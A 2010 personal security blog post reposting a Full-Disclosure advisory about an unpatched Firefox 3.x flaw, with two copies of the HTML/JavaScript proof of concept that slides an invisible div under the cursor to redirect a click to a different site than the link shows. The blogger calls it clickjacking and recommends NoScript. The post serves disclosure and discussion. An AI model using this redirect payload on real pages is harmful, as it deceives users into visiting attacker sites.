Xanda's Blog !~!

Phishing or Clickjacking?

Feb
26

I was about to shutdown my machine and go to sleep but suddenly my RSS reader popping up new feeds.

Here is one thing that made me smile:

Mozilla firefox 3.6 unpatched phishing vulnerability

From: bugsbanned () hushmail com
Date: Wed, 24 Feb 2010 19:29:33 -0300

…Unpatched bug since Mozilla firefox 3.0…

Mozilla “INsecurity team” remember, security through obscurity just
DOESN’T WORK…
Locking down bugzilla advisories even the 2 years old ones is
unnecessary and lame.

<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://Maliciouswebsite’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<br>
<a href=”http://trustedwebsite”; onclick=”updatebox(event)”><font
style=”font-family:arial;font-size:32px”>http://trusted
website</font></a><br>

</div>
</body>
</html>

For example:

<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://www.wikipedia.org’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<br>
<a href=”http://www.google.com”; onclick=”updatebox(event)”><font
style=”font-family:arial;font-
size:32px”>http://www.google.com</font></a><br>

</div>
</body>
</html>

Source:www exploit-db com

Phishing huh? To me its clickjacking 🙂

Source: http://seclists.org/fulldisclosure/2010/Feb/434

P/S: Owh ya, NoScript is one of my best friend and he wants to be your best friend to 😉

2 Responses to Phishing or Clickjacking?

  1. aku rasa macam clickjacking saje nie..
    nape tiba2 ko cakap or phishing nie?

  2. aku cakap phishing? aku ngajing mamat tu je aaa…

    Phishing huh? <= tu ayat nganjing

Leave a Reply

Your email address will not be published. Required fields are marked *